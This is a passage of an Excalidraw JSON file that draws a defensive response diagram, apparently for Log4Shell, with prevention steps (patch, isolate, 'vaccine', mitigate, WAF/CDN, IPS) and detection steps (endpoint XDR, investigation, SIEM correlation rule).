105 | "baseline": 53.99897159011915,
106 | "containerId": null,
107 | "originalText": "First line of defense\nBlock / prevent before exploitation"
108 | },
109 | {
110 | "type": "text",
111 | "version": 342,
112 | "versionNonce": 1889407936,
113 | "isDeleted": false,
114 | "id": "W2io7L4z7Wr9KLen_e_tx",
115 | "fillStyle": "hachure",
116 | "strokeWidth": 1,
117 | "strokeStyle": "dashed",
118 | "roughness": 1,
119 | "opacity": 100,
120 | "angle": 0,
121 | "x": 114.75,
122 | "y": 986.6756433980631,
123 | "strokeColor": "#364fc7",
124 | "backgroundColor": "transparent",
125 | "width": 460.7925954488579,
126 | "height": 63.99897159011915,
127 | "seed": 837281856,
128 | "groupIds": [],
129 | "strokeSharpness": "sharp",
130 | "boundElements": [],
131 | "updated": 1639775213769,
132 | "fontSize": 25.599588636047667,
133 | "fontFamily": 1,
134 | "text": "Second line of defense\nMitigate after exploitation attempt",
135 | "baseline": 53.99897159011915,
136 | "textAlign": "left",
137 | "verticalAlign": "top",
138 | "containerId": null,
139 | "originalText": "Second line of defense\nMitigate after exploitation attempt"
140 | },
141 | {
142 | "type": "rectangle",
143 | "version": 174,
144 | "versionNonce": 2127431744,
145 | "isDeleted": false,
146 | "id": "bIs-X4tkZ5FiKhZ_A1t5K",
147 | "fillStyle": "hachure",
148 | "strokeWidth": 1,
149 | "strokeStyle": "solid",
150 | "roughness": 1,
151 | "opacity": 100,
152 | "angle": 0,
153 | "x": 262.25,
154 | "y": -29.750000000000014,
155 | "strokeColor": "#000000",
156 | "backgroundColor": "transparent",
157 | "width": 257.5,
158 | "height": 75,
159 | "seed": 174686272,
160 | "groupIds": [],
161 | "strokeSharpness": "sharp",
162 | "boundElements": [],
163 | "updated": 1639775213769
164 | },
165 | {
166 | "type": "text",
167 | "version": 186,
168 | "versionNonce": 589667264,
169 | "isDeleted": false,
170 | "id": "Pu7vmeyr_rwCynH5a6OTK",
171 | "fillStyle": "hachure",
172 | "strokeWidth": 1,
173 | "strokeStyle": "solid",
174 | "roughness": 1,
175 | "opacity": 100,
176 | "angle": 0,
177 | "x": 340.5,
178 | "y": -20.000000000000014,
179 | "strokeColor": "#000000",
180 | "backgroundColor": "transparent",
181 | "width": 101,
182 | "height": 25,
183 | "seed": 1260233664,
184 | "groupIds": [],
185 | "strokeSharpness": "sharp",
186 | "boundElements": [],
187 | "updated": 1639775213769,
188 | "fontSize": 20,
189 | "fontFamily": 1,
190 | "text": "Version 1.0",
191 | "baseline": 18,
192 | "textAlign": "center",
193 | "verticalAlign": "top",
194 | "containerId": null,
195 | "originalText": "Version 1.0"
196 | },
197 | {
198 | "type": "rectangle",
199 | "version": 153,
200 | "versionNonce": 1080229952,
201 | "isDeleted": false,
202 | "id": "2GulcqxwG_RiJBhOMkNPN",
203 | "fillStyle": "hachure",
204 | "strokeWidth": 1,
205 | "strokeStyle": "solid",
206 | "roughness": 1,
207 | "opacity": 100,
208 | "angle": 0,
209 | "x": 331,
210 | "y": 13.999999999999986,
211 | "strokeColor": "#000000",
212 | "backgroundColor": "#000000",
213 | "width": 115,
214 | "height": 26.25,
215 | "seed": 969898048,
216 | "groupIds": [],
217 | "strokeSharpness": "sharp",
218 | "boundElements": [],
219 | "updated": 1639775213769
220 | },
221 | {
222 | "type": "text",
223 | "version": 146,
224 | "versionNonce": 729555904,
225 | "isDeleted": false,
226 | "id": "QPzdf9CW3yDX53mB2CsIA",
227 | "fillStyle": "hachure",
228 | "strokeWidth": 1,
229 | "strokeStyle": "solid",
230 | "roughness": 1,
231 | "opacity": 100,
232 | "angle": 0,
233 | "x": 332,
234 | "y": 16.249999999999986,
235 | "strokeColor": "#000000",
236 | "backgroundColor": "#000000",
237 | "width": 113,
238 | "height": 25,
239 | "seed": 657664960,
240 | "groupIds": [],
241 | "strokeSharpness": "sharp",
242 | "boundElements": [],
243 | "updated": 1639775213769,
244 | "fontSize": 20,
245 | "fontFamily": 1,
246 | "text": "TLP:WHITE",
247 | "baseline": 18,
248 | "textAlign": "center",
249 | "verticalAlign": "top",
250 | "containerId": null,
251 | "originalText": ""
252 | },
253 | {
254 | "id": "f952sVmGsO9Z4OiOFtObz",
255 | "type": "rectangle",
256 | "x": 1106.734059646845,
257 | "y": 94.52997943180243,
258 | "width": 269,
259 | "height": 110,
260 | "angle": 0,
261 | "strokeColor": "#c92a2a",
262 | "backgroundColor": "transparent",
263 | "fillStyle": "hachure",
264 | "strokeWidth": 1,
265 | "strokeStyle": "dashed",
266 | "roughness": 1,
267 | "opacity": 100,
268 | "groupIds": [],
269 | "strokeSharpness": "sharp",
270 | "seed": 2008887360,
271 | "version": 641,
272 | "versionNonce": 1956182080,
273 | "isDeleted": false,
274 | "boundElements": [
275 | {
276 | "type": "text",
277 | "id": "UvNVpKk_AU_uXr_yF7NiT"
278 | }
279 | ],
280 | "updated": 1639775213769
281 | },
282 | {
283 | "id": "UvNVpKk_AU_uXr_yF7NiT",
284 | "type": "text",
285 | "x": 1136.6355000000003,
286 | "y": 136.4287500000001,
287 | "width": 209,
288 | "height": 25,
289 | "angle": 0,
290 | "strokeColor": "#c92a2a",
291 | "backgroundColor": "transparent",
292 | "fillStyle": "hachure",
293 | "strokeWidth": 1,
294 | "strokeStyle": "dashed",
295 | "roughness": 1,
296 | "opacity": 100,
297 | "groupIds": [],
298 | "strokeSharpness": "sharp",
299 | "seed": 1911634880,
300 | "version": 516,
301 | "versionNonce": 2009181120,
302 | "isDeleted": false,
303 | "boundElements": null,
304 | "updated": 1639775213769,
305 | "text": "WAF/CDN",
306 | "fontSize": 20,
307 | "fontFamily": 1,
308 | "textAlign": "center",
309 | "verticalAlign": "middle",
310 | "baseline": 18,
311 | "containerId": "f952sVmGsO9Z4OiOFtObz",
312 | "originalText": "WAF/CDN"
313 | },
314 | {
315 | "id": "u5FiVXeDz9ghORk_u5j51",
316 | "type": "rectangle",
317 | "x": 139.06960920424513,
318 | "y": 93.24999999999999,
319 | "width": 170.23726442971682,
320 | "height": 110,
321 | "angle": 0,
322 | "strokeColor": "#c92a2a",
323 | "backgroundColor": "transparent",
324 | "fillStyle": "hachure",
325 | "strokeWidth": 1,
326 | "strokeStyle": "dashed",
327 | "roughness": 1,
328 | "opacity": 100,
329 | "groupIds": [],
330 | "strokeSharpness": "sharp",
331 | "seed": 551795648,
332 | "version": 392,
333 | "versionNonce": 525332544,
334 | "isDeleted": false,
335 | "boundElements": [
336 | {
337 | "type": "text",
338 | "id": "us243Lv2K0OC2V0OJVTGl"
339 | }
340 | ],
341 | "updated": 1639775213769
342 | },
343 | {
344 | "id": "us243Lv2K0OC2V0OJVTGl",
345 | "type": "text",
346 | "x": 169.18849999999998,
347 | "y": 135.14875000000012,
348 | "width": 110,
349 | "height": 25,
350 | "angle": 0,
351 | "strokeColor": "#c92a2a",
352 | "backgroundColor": "transparent",
353 | "fillStyle": "hachure",
354 | "strokeWidth": 1,
355 | "strokeStyle": "dashed",
356 | "roughness": 1,
357 | "opacity": 100,
358 | "groupIds": [],
359 | "strokeSharpness": "sharp",
360 | "seed": 1679881152,
361 | "version": 318,
362 | "versionNonce": 840315840,
363 | "isDeleted": false,
364 | "boundElements": null,
365 | "updated": 1639775213770,
366 | "text": "#1 PATCH",
367 | "fontSize": 20,
368 | "fontFamily": 1,
369 | "textAlign": "center",
370 | "verticalAlign": "middle",
371 | "baseline": 18,
372 | "containerId": "u5FiVXeDz9ghORk_u5j51",
373 | "originalText": "#1 PATCH"
374 | },
375 | {
376 | "id": "6sjUuI-WXOo7gzxtg9RdW",
377 | "type": "line",
378 | "x": 1059.5519797946422,
379 | "y": 99.36980887423661,
380 | "width": 1.750042099236329,
381 | "height": 952.3610610097963,
382 | "angle": 0,
383 | "strokeColor": "#000000",
384 | "backgroundColor": "transparent",
385 | "fillStyle": "hachure",
386 | "strokeWidth": 1,
387 | "strokeStyle": "dashed",
388 | "roughness": 1,
389 | "opacity": 100,
390 | "groupIds": [],
391 | "strokeSharpness": "round",
392 | "seed": 1379224512,
393 | "version": 243,
394 | "versionNonce": 1214769216,
395 | "isDeleted": false,
396 | "boundElements": null,
397 | "updated": 1639775213770,
398 | "points": [
399 | [
400 | 0,
401 | 0
402 | ],
403 | [
404 | -1.750042099236329,
405 | 952.3610610097963
406 | ]
407 | ],
408 | "lastCommittedPoint": null,
409 | "startBinding": null,
410 | "endBinding": null,
411 | "startArrowhead": null,
412 | "endArrowhead": null
413 | },
414 | {
415 | "id": "sR_n049nx3PwZ4RpMmyQ-",
416 | "type": "text",
417 | "x": 1077.5997214026288,
418 | "y": 1015.2619252034037,
419 | "width": 212.26553184465985,
420 | "height": 55.27748225121354,
421 | "angle": 0,
422 | "strokeColor": "#862e9c",
423 | "backgroundColor": "transparent",
424 | "fillStyle": "hachure",
425 | "strokeWidth": 1,
426 | "strokeStyle": "dashed",
427 | "roughness": 1,
428 | "opacity": 100,
429 | "groupIds": [],
430 | "strokeSharpness": "sharp",
431 | "seed": 1210302528,
432 | "version": 175,
433 | "versionNonce": 1658815424,
434 | "isDeleted": false,
435 | "boundElements": null,
436 | "updated": 1639775219978,
437 | "text": "Detection",
438 | "fontSize": 44.22198580097085,
439 | "fontFamily": 1,
440 | "textAlign": "left",
441 | "verticalAlign": "top",
442 | "baseline": 38.27748225121354,
443 | "containerId": null,
444 | "originalText": "Detection"
445 | },
446 | {
447 | "id": "mFlM-xTMrc8KXxnBlo-Kk",
448 | "type": "text",
449 | "x": 833.5352607470559,
450 | "y": 1015.5854930338044,
451 | "width": 195.46821898940547,
452 | "height": 48.38322252213006,
453 | "angle": 0,
454 | "strokeColor": "#0b7285",
455 | "backgroundColor": "transparent",
456 | "fillStyle": "hachure",
457 | "strokeWidth": 1,
458 | "strokeStyle": "dashed",
459 | "roughness": 1,
460 | "opacity": 100,
461 | "groupIds": [],
462 | "strokeSharpness": "sharp",
463 | "seed": 26028992,
464 | "version": 185,
465 | "versionNonce": 1164723136,
466 | "isDeleted": false,
467 | "boundElements": null,
468 | "updated": 1639775213770,
469 | "text": "Prevention",
470 | "fontSize": 38.70657801770407,
471 | "fontFamily": 1,
472 | "textAlign": "left",
473 | "verticalAlign": "top",
474 | "baseline": 34.38322252213006,
475 | "containerId": null,
476 | "originalText": "Prevention"
477 | },
478 | {
479 | "type": "rectangle",
480 | "version": 759,
481 | "versionNonce": 1228593216,
482 | "isDeleted": false,
483 | "id": "OfeGdAfaUIgkhzvMbnFM2",
484 | "fillStyle": "hachure",
485 | "strokeWidth": 1,
486 | "strokeStyle": "dashed",
487 | "roughness": 1,
488 | "opacity": 100,
489 | "angle": 0,
490 | "x": 359.22607147425504,
491 | "y": 95.1699691477035,
492 | "strokeColor": "#c92a2a",
493 | "backgroundColor": "transparent",
494 | "width": 214,
495 | "height": 110,
496 | "seed": 186039232,
497 | "groupIds": [],
498 | "strokeSharpness": "sharp",
499 | "boundElements": [
500 | {
501 | "id": "bq4U_UKrEvwY3uV9h4aK7",
502 | "type": "text"
503 | },
504 | {
505 | "type": "text",
506 | "id": "bq4U_UKrEvwY3uV9h4aK7"
507 | }
508 | ],
509 | "updated": 1639775213770
510 | },
511 | {
512 | "type": "text",
513 | "version": 490,
514 | "versionNonce": 514706368,
515 | "isDeleted": false,
516 | "id": "bq4U_UKrEvwY3uV9h4aK7",
517 | "fillStyle": "hachure",
518 | "strokeWidth": 1,
519 | "strokeStyle": "dashed",
520 | "roughness": 1,
521 | "opacity": 100,
522 | "angle": 0,
523 | "x": 389.10474999999997,
524 | "y": 137.0687500000001,
525 | "strokeColor": "#c92a2a",
526 | "backgroundColor": "transparent",
527 | "width": 154,
528 | "height": 25,
529 | "seed": 1670635584,
530 | "groupIds": [],
531 | "strokeSharpness": "sharp",
532 | "boundElements": [],
533 | "updated": 1639775213770,
534 | "fontSize": 20,
535 | "fontFamily": 1,
536 | "text": "#2 ISOLATE",
537 | "baseline": 18,
538 | "textAlign": "center",
539 | "verticalAlign": "middle",
540 | "containerId": "OfeGdAfaUIgkhzvMbnFM2",
541 | "originalText": "#2 ISOLATE"
542 | },
543 | {
544 | "type": "rectangle",
545 | "version": 924,
546 | "versionNonce": 767368128,
547 | "isDeleted": false,
548 | "id": "EN8H39pyEHWyI8JM2pF-m",
549 | "fillStyle": "hachure",
550 | "strokeWidth": 1,
551 | "strokeStyle": "dashed",
552 | "roughness": 1,
553 | "opacity": 100,
554 | "angle": 0,
555 | "x": 598.1520915280156,
556 | "y": 95.13998971590131,
557 | "strokeColor": "#c92a2a",
558 | "backgroundColor": "transparent",
559 | "width": 198.3968119293694,
560 | "height": 110,
561 | "seed": 206989376,
562 | "groupIds": [],
563 | "strokeSharpness": "sharp",
564 | "boundElements": [
565 | {
566 | "id": "2fFte5I6ZPLUdll9DBdRJ",
567 | "type": "text"
568 | },
569 | {
570 | "id": "2fFte5I6ZPLUdll9DBdRJ",
571 | "type": "text"
572 | },
573 | {
574 | "type": "text",
575 | "id": "2fFte5I6ZPLUdll9DBdRJ"
576 | }
577 | ],
578 | "updated": 1639775315093
579 | },
580 | {
581 | "type": "text",
582 | "version": 641,
583 | "versionNonce": 1828945984,
584 | "isDeleted": false,
585 | "id": "2fFte5I6ZPLUdll9DBdRJ",
586 | "fillStyle": "hachure",
587 | "strokeWidth": 1,
588 | "strokeStyle": "dashed",
589 | "roughness": 1,
590 | "opacity": 100,
591 | "angle": 0,
592 | "x": 628.3510000000001,
593 | "y": 137.0387500000001,
594 | "strokeColor": "#c92a2a",
595 | "backgroundColor": "transparent",
596 | "width": 138,
597 | "height": 25,
598 | "seed": 1490238400,
599 | "groupIds": [],
600 | "strokeSharpness": "sharp",
601 | "boundElements": [],
602 | "updated": 1639775315093,
603 | "fontSize": 20,
604 | "fontFamily": 1,
605 | "text": "#3 VACCINE",
606 | "baseline": 18,
607 | "textAlign": "center",
608 | "verticalAlign": "middle",
609 | "containerId": "EN8H39pyEHWyI8JM2pF-m",
610 | "originalText": "#3 VACCINE"
611 | },
612 | {
613 | "type": "rectangle",
614 | "version": 808,
615 | "versionNonce": 101828672,
616 | "isDeleted": false,
617 | "id": "8JP6rU0LrHNSc5uCF1Jok",
618 | "fillStyle": "hachure",
619 | "strokeWidth": 1,
620 | "strokeStyle": "dashed",
621 | "roughness": 1,
622 | "opacity": 100,
623 | "angle": 0,
624 | "x": 1414.5691129953184,
625 | "y": 95.1699691477035,
626 | "strokeColor": "#c92a2a",
627 | "backgroundColor": "transparent",
628 | "width": 270.0756601103026,
629 | "height": 108.7982517032025,
630 | "seed": 243381184,
631 | "groupIds": [],
632 | "strokeSharpness": "sharp",
633 | "boundElements": [
634 | {
635 | "id": "0sAWw4RV3TBM_-7MEGOBs",
636 | "type": "text"
637 | },
638 | {
639 | "type": "text",
640 | "id": "0sAWw4RV3TBM_-7MEGOBs"
641 | }
642 | ],
643 | "updated": 1639775213770
644 | },
645 | {
646 | "type": "text",
647 | "version": 655,
648 | "versionNonce": 1929239488,
649 | "isDeleted": false,
650 | "id": "0sAWw4RV3TBM_-7MEGOBs",
651 | "fillStyle": "hachure",
652 | "strokeWidth": 1,
653 | "strokeStyle": "dashed",
654 | "roughness": 1,
655 | "opacity": 100,
656 | "angle": 0,
657 | "x": 1444.5691129953184,
658 | "y": 137.06909499930475,
659 | "strokeColor": "#c92a2a",
660 | "backgroundColor": "transparent",
661 | "width": 210.07566011030258,
662 | "height": 25,
663 | "seed": 1517578304,
664 | "groupIds": [],
665 | "strokeSharpness": "sharp",
666 | "boundElements": [],
667 | "updated": 1639775213770,
668 | "fontSize": 20,
669 | "fontFamily": 1,
670 | "text": "IPS",
671 | "baseline": 18,
672 | "textAlign": "center",
673 | "verticalAlign": "middle",
674 | "containerId": "8JP6rU0LrHNSc5uCF1Jok",
675 | "originalText": "IPS"
676 | },
677 | {
678 | "type": "rectangle",
679 | "version": 1150,
680 | "versionNonce": 690929728,
681 | "isDeleted": false,
682 | "id": "lQ50J00GPYxhAfMthTmX1",
683 | "fillStyle": "solid",
684 | "strokeWidth": 1,
685 | "strokeStyle": "dashed",
686 | "roughness": 1,
687 | "opacity": 100,
688 | "angle": 0,
689 | "x": 856.4980807294805,
690 | "y": 564.9224206191775,
691 | "strokeColor": "#364fc7",
692 | "backgroundColor": "#ffffff",
693 | "width": 380.1538912453079,
694 | "height": 140.797737498262,
695 | "seed": 1850160064,
696 | "groupIds": [],
697 | "strokeSharpness": "sharp",
698 | "boundElements": [
699 | {
700 | "id": "QPjukRS8lxB7lHmLfb1AO",
701 | "type": "text"
702 | },
703 | {
704 | "id": "QPjukRS8lxB7lHmLfb1AO",
705 | "type": "text"
706 | },
707 | {
708 | "id": "QPjukRS8lxB7lHmLfb1AO",
709 | "type": "text"
710 | },
711 | {
712 | "type": "text",
713 | "id": "QPjukRS8lxB7lHmLfb1AO"
714 | }
715 | ],
716 | "updated": 1639775213770
717 | },
718 | {
719 | "type": "text",
720 | "version": 851,
721 | "versionNonce": 1447846848,
722 | "isDeleted": false,
723 | "id": "QPjukRS8lxB7lHmLfb1AO",
724 | "fillStyle": "hachure",
725 | "strokeWidth": 1,
726 | "strokeStyle": "dashed",
727 | "roughness": 1,
728 | "opacity": 100,
729 | "angle": 0,
730 | "x": 886.4980807294805,
731 | "y": 610.3212893683085,
732 | "strokeColor": "#364fc7",
733 | "backgroundColor": "transparent",
734 | "width": 320.1538912453079,
735 | "height": 50,
736 | "seed": 1673979968,
737 | "groupIds": [],
738 | "strokeSharpness": "sharp",
739 | "boundElements": [],
740 | "updated": 1639775213770,
741 | "fontSize": 20,
742 | "fontFamily": 1,
743 | "text": "ENDPOINT\nXDR/EPP",
744 | "baseline": 43,
745 | "textAlign": "center",
746 | "verticalAlign": "middle",
747 | "containerId": "lQ50J00GPYxhAfMthTmX1",
748 | "originalText": "ENDPOINT\nXDR/EPP"
749 | },
750 | {
751 | "type": "rectangle",
752 | "version": 1303,
753 | "versionNonce": 1307359296,
754 | "isDeleted": false,
755 | "id": "CqNdx62OBlHtjpXfEZu0T",
756 | "fillStyle": "hachure",
757 | "strokeWidth": 1,
758 | "strokeStyle": "dashed",
759 | "roughness": 1,
760 | "opacity": 100,
761 | "angle": 0,
762 | "x": 1243.5615194744405,
763 | "y": 565.6223691986833,
764 | "strokeColor": "#364fc7",
765 | "backgroundColor": "transparent",
766 | "width": 507.00000000000006,
767 | "height": 140.797737498262,
768 | "seed": 1547135040,
769 | "groupIds": [],
770 | "strokeSharpness": "sharp",
771 | "boundElements": [
772 | {
773 | "id": "ddb5hY7wF8ipDzXleyIkV",
774 | "type": "text"
775 | },
776 | {
777 | "id": "ddb5hY7wF8ipDzXleyIkV",
778 | "type": "text"
779 | },
780 | {
781 | "id": "ddb5hY7wF8ipDzXleyIkV",
782 | "type": "text"
783 | },
784 | {
785 | "id": "ddb5hY7wF8ipDzXleyIkV",
786 | "type": "text"
787 | },
788 | {
789 | "type": "text",
790 | "id": "ddb5hY7wF8ipDzXleyIkV"
791 | }
792 | ],
793 | "updated": 1639775213770
794 | },
795 | {
796 | "type": "text",
797 | "version": 1073,
798 | "versionNonce": 1586097088,
799 | "isDeleted": false,
800 | "id": "ddb5hY7wF8ipDzXleyIkV",
801 | "fillStyle": "hachure",
802 | "strokeWidth": 1,
803 | "strokeStyle": "dashed",
804 | "roughness": 1,
805 | "opacity": 100,
806 | "angle": 0,
807 | "x": 1273.5625,
808 | "y": 611.0212500000001,
809 | "strokeColor": "#364fc7",
810 | "backgroundColor": "transparent",
811 | "width": 447,
812 | "height": 50,
813 | "seed": 864172992,
814 | "groupIds": [],
815 | "strokeSharpness": "sharp",
816 | "boundElements": [],
817 | "updated": 1639775213770,
818 | "fontSize": 20,
819 | "fontFamily": 1,
820 | "text": "INVESTIGATE\nPRESERVE EVIDENCE ",
821 | "baseline": 43,
822 | "textAlign": "center",
823 | "verticalAlign": "middle",
824 | "containerId": "CqNdx62OBlHtjpXfEZu0T",
825 | "originalText": "INVESTIGATE\nPRESERVE EVIDENCE "
826 | },
827 | {
828 | "type": "rectangle",
829 | "version": 1267,
830 | "versionNonce": 405516352,
831 | "isDeleted": false,
832 | "id": "jIQL8E-5ZhEgZ-jPJClDd",
833 | "fillStyle": "hachure",
834 | "strokeWidth": 1,
835 | "strokeStyle": "dashed",
836 | "roughness": 1,
837 | "opacity": 100,
838 | "angle": 0,
839 | "x": 1764.0034978773688,
840 | "y": 570.6823280622888,
841 | "strokeColor": "#364fc7",
842 | "backgroundColor": "transparent",
843 | "width": 366.07411749548146,
844 | "height": 140.797737498262,
845 | "seed": 896954432,
846 | "groupIds": [],
847 | "strokeSharpness": "sharp",
848 | "boundElements": [
849 | {
850 | "id": "wUm0A9T02ooH6J_FunPIE",
851 | "type": "text"
852 | },
853 | {
854 | "id": "wUm0A9T02ooH6J_FunPIE",
855 | "type": "text"
856 | },
857 | {
858 | "id": "wUm0A9T02ooH6J_FunPIE",
859 | "type": "text"
860 | },
861 | {
862 | "id": "wUm0A9T02ooH6J_FunPIE",
863 | "type": "text"
864 | },
865 | {
866 | "id": "wUm0A9T02ooH6J_FunPIE",
867 | "type": "text"
868 | },
869 | {
870 | "type": "text",
871 | "id": "wUm0A9T02ooH6J_FunPIE"
872 | }
873 | ],
874 | "updated": 1639775213770
875 | },
876 | {
877 | "type": "text",
878 | "version": 1014,
879 | "versionNonce": 366375872,
880 | "isDeleted": false,
881 | "id": "wUm0A9T02ooH6J_FunPIE",
882 | "fillStyle": "hachure",
883 | "strokeWidth": 1,
884 | "strokeStyle": "dashed",
885 | "roughness": 1,
886 | "opacity": 100,
887 | "angle": 0,
888 | "x": 1794.0034978773688,
889 | "y": 616.0811968114198,
890 | "strokeColor": "#364fc7",
891 | "backgroundColor": "transparent",
892 | "width": 306.07411749548146,
893 | "height": 50,
894 | "seed": 1469559744,
895 | "groupIds": [],
896 | "strokeSharpness": "sharp",
897 | "boundElements": [],
898 | "updated": 1639775213771,
899 | "fontSize": 20,
900 | "fontFamily": 1,
901 | "text": "SIEM\nCORRELATION RULE",
902 | "baseline": 43,
903 | "textAlign": "center",
904 | "verticalAlign": "middle",
905 | "containerId": "jIQL8E-5ZhEgZ-jPJClDd",
906 | "originalText": "SIEM\nCORRELATION RULE"
907 | },
908 | {
909 | "type": "rectangle",
910 | "version": 1312,
911 | "versionNonce": 801876032,
912 | "isDeleted": false,
913 | "id": "bvE03dboSek0F4Rblmaxy",
914 | "fillStyle": "hachure",
915 | "strokeWidth": 1,
916 | "strokeStyle": "dashed",
917 | "roughness": 1,
918 | "opacity": 100,
919 | "angle": 0,
920 | "x": 496.8238603930117,
921 | "y": 563.0024514714747,
922 | "strokeColor": "#364fc7",
923 | "backgroundColor": "transparent",
924 | "width": 343.0344877230387,
925 | "height": 140.797737498262,
926 | "seed": 661132224,
927 | "groupIds": [],
928 | "strokeSharpness": "sharp",
929 | "boundElements": [
930 | {
931 | "id": "CMLOqKbtvi1NLeMwx7XAv",
932 | "type": "text"
933 | },
934 | {
935 | "id": "CMLOqKbtvi1NLeMwx7XAv",
936 | "type": "text"
937 | },
938 | {
939 | "id": "CMLOqKbtvi1NLeMwx7XAv",
940 | "type": "text"
941 | },
942 | {
943 | "id": "CMLOqKbtvi1NLeMwx7XAv",
944 | "type": "text"
945 | },
946 | {
947 | "id": "CMLOqKbtvi1NLeMwx7XAv",
948 | "type": "text"
949 | },
950 | {
951 | "type": "text",
952 | "id": "CMLOqKbtvi1NLeMwx7XAv"
953 | }
954 | ],
955 | "updated": 1639775213771
956 | },
957 | {
958 | "type": "text",
959 | "version": 1126,
960 | "versionNonce": 1112669120,
961 | "isDeleted": false,
962 | "id": "CMLOqKbtvi1NLeMwx7XAv",
963 | "fillStyle": "hachure",
964 | "strokeWidth": 1,
965 | "strokeStyle": "dashed",
966 | "roughness": 1,
967 | "opacity": 100,
968 | "angle": 0,
969 | "x": 526.8407499999998,
970 | "y": 595.9012500000001,
971 | "strokeColor": "#364fc7",
972 | "backgroundColor": "transparent",
973 | "width": 283,
974 | "height": 50,
975 | "seed": 1906575424,
976 | "groupIds": [],
977 | "strokeSharpness": "sharp",
978 | "boundElements": [],
979 | "updated": 1639775213771,
980 | "fontSize": 20,
981 | "fontFamily": 1,
982 | "text": "FILTER INTERNAL\nSENSITIVE ASSETS",
983 | "baseline": 43,
984 | "textAlign": "center",
985 | "verticalAlign": "middle",
986 | "containerId": "bvE03dboSek0F4Rblmaxy",
987 | "originalText": "FILTER INTERNAL\nSENSITIVE ASSETS"
988 | },
989 | {
990 | "id": "pRAJQscNEO55-0GSP_mSP",
991 | "type": "rectangle",
992 | "x": 598.7920812439177,
993 | "y": 237.85769636186723,
994 | "width": 206.0766885201836,
995 | "height": 138.2377786346574,
996 | "angle": 0,
997 | "strokeColor": "#000000",
998 | "backgroundColor": "#ffffff",
999 | "fillStyle": "solid",
1000 | "strokeWidth": 1,
1001 | "strokeStyle": "dotted",
1002 | "roughness": 1,
1003 | "opacity": 100,
1004 | "groupIds": [],
1005 | "strokeSharpness": "sharp",
1006 | "seed": 1934361536,
1007 | "version": 263,
1008 | "versionNonce": 1998824384,
1009 | "isDeleted": false,
1010 | "boundElements": null,
1011 | "updated": 1639775315093
1012 | },
1013 | {
1014 | "id": "qdfIgz6uhvffnWAKImBI1",
1015 | "type": "text",
1016 | "x": 607.7519372665345,
1017 | "y": 326.1762771562321,
1018 | "width": 193,
1019 | "height": 28,
1020 | "angle": 0,
1021 | "strokeColor": "#000000",
1022 | "backgroundColor": "#ffffff",
1023 | "fillStyle": "solid",
1024 | "strokeWidth": 1,
1025 | "strokeStyle": "dashed",
1026 | "roughness": 1,
1027 | "opacity": 100,
1028 | "groupIds": [],
1029 | "strokeSharpness": "sharp",
1030 | "seed": 2120056896,
1031 | "version": 454,
1032 | "versionNonce": 959019072,
1033 | "isDeleted": false,
1034 | "boundElements": null,
1035 | "updated": 1639775315093,
1036 | "text": "https://github.com/Cybereason/\nLogout4Shell",
1037 | "fontSize": 10.989198916379799,
1038 | "fontFamily": 3,
1039 | "textAlign": "left",
1040 | "verticalAlign": "top",
1041 | "baseline": 25,
1042 | "containerId": null,
1043 | "originalText": "https://github.com/Cybereason/\nLogout4Shell"
1044 | },
1045 | {
1046 | "id": "abRWh9bjq3dg4vCAqj8q_",
1047 | "type": "text",
1048 | "x": 601.3520401075219,
1049 | "y": 246.81755238448358,
1050 | "width": 198.39681192936942,
1051 | "height": 58.35200350863805,
1052 | "angle": 0,
1053 | "strokeColor": "#000000",
1054 | "backgroundColor": "#ffffff",
1055 | "fillStyle": "solid",
1056 | "strokeWidth": 1,
1057 | "strokeStyle": "dashed",
1058 | "roughness": 1,
1059 | "opacity": 100,
1060 | "groupIds": [],
1061 | "strokeSharpness": "sharp",
1062 | "seed": 2046616512,
1063 | "version": 317,
1064 | "versionNonce": 1652108224,
1065 | "isDeleted": false,
1066 | "boundElements": null,
1067 | "updated": 1639775315093,
1068 | "text": "A \"vaccine\" allows live\npatching of any application by\nexploiting the vulnerability",
1069 | "fontSize": 15.560534268970153,
1070 | "fontFamily": 1,
1071 | "textAlign": "center",
1072 | "verticalAlign": "top",
1073 | "baseline": 52.35200350863805,
1074 | "containerId": null,
1075 | "originalText": "A \"vaccine\" allows live\npatching of any application by\nexploiting the vulnerability"
1076 | },
1077 | {
1078 | "type": "rectangle",
1079 | "version": 1052,
1080 | "versionNonce": 296849472,
1081 | "isDeleted": false,
1082 | "id": "fLSWb6ysdctjonqOBnXai",
1083 | "fillStyle": "hachure",
1084 | "strokeWidth": 1,
1085 | "strokeStyle": "dashed",
1086 | "roughness": 1,
1087 | "opacity": 100,
1088 | "angle": 0,
1089 | "x": 824.4985949344216,
1090 | "y": 93.88998971590131,
1091 | "strokeColor": "#c92a2a",
1092 | "backgroundColor": "transparent",
1093 | "width": 221.436441701812,
1094 | "height": 110,
1095 | "seed": 737162176,
1096 | "groupIds": [],
1097 | "strokeSharpness": "sharp",
1098 | "boundElements": [
1099 | {
1100 | "id": "VufhYpPQd2liAy9uDunP7",
1101 | "type": "text"
1102 | },
1103 | {
1104 | "id": "VufhYpPQd2liAy9uDunP7",
1105 | "type": "text"
1106 | },
1107 | {
1108 | "id": "VufhYpPQd2liAy9uDunP7",
1109 | "type": "text"
1110 | },
1111 | {
1112 | "type": "text",
1113 | "id": "VufhYpPQd2liAy9uDunP7"
1114 | }
1115 | ],
1116 | "updated": 1639775213771
1117 | },
1118 | {
1119 | "type": "text",
1120 | "version": 759,
1121 | "versionNonce": 1209963456,
1122 | "isDeleted": false,
1123 | "id": "VufhYpPQd2liAy9uDunP7",
1124 | "fillStyle": "hachure",
1125 | "strokeWidth": 1,
1126 | "strokeStyle": "dashed",
1127 | "roughness": 1,
1128 | "opacity": 100,
1129 | "angle": 0,
1130 | "x": 854.71675,
1131 | "y": 135.7887500000001,
1132 | "strokeColor": "#c92a2a",
1133 | "backgroundColor": "transparent",
1134 | "width": 161,
1135 | "height": 25,
1136 | "seed": 1898833984,
1137 | "groupIds": [],
1138 | "strokeSharpness": "sharp",
1139 | "boundElements": [],
1140 | "updated": 1639775213771,
1141 | "fontSize": 20,
1142 | "fontFamily": 1,
1143 | "text": "#4 MITIGATE",
1144 | "baseline": 18,
1145 | "textAlign": "center",
1146 | "verticalAlign": "middle",
1147 | "containerId": "fLSWb6ysdctjonqOBnXai",
1148 | "originalText": "#4 MITIGATE"
1149 | },
1150 | {
1151 | "type": "rectangle",
1152 | "version": 457,
1153 | "versionNonce": 2094834624,
1154 | "isDeleted": false,
1155 | "id": "s3foEZGNuENKTb3fu63FA",
1156 | "fillStyle": "solid",
1157 | "strokeWidth": 1,
1158 | "strokeStyle": "dotted",
1159 | "roughness": 1,
1160 | "opacity": 100,
1161 | "angle": 0,
